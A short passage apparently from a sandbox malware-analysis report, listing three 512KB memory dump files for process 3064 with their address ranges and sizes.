                                                                                                                                            • memory/3064-57-0x00000000028B0000-0x0000000002930000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              512KB

                                                                                                                                            • memory/3064-59-0x00000000028B0000-0x0000000002930000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              512KB

                                                                                                                                            • memory/3064-61-0x00000000028B0000-0x0000000002930000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              512KB